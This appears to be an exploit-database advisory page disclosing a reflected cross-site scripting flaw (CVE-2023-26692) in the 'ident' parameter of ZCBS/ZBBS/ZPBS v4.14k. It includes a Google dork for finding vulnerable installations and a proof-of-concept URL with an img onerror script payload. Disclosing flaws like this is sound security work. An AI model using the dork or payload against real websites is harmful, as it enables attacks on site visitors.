header-logo
Suggest Exploit
vendor:
ZCBS/ZBBS/ZPBS
by:
Abdulaziz Saad
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: ZCBS/ZBBS/ZPBS
Affected Version From: 4.14k
Affected Version To: 4.14k
Patch Exists: YES
Related CWE: CVE-2023-26692
CPE: a:zcbs:zcbs:4.14k
Metasploit:
Other Scripts:
Platforms Tested: LAMP, Ubuntu
2023

ZCBS/ZBBS/ZPBS v4.14k – Reflected Cross-Site Scripting (XSS)

The vulnerability exists due to insufficient sanitization of the 'ident' parameter in the 'objecten.pl' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary HTML and script code in the browser of the victim in context of the vulnerable website.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D

---

[#] Vulnerability :

`$_GET['ident']`


[#] Exploitation :

`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`

Navigation

Suggest Exploit

Services By CQR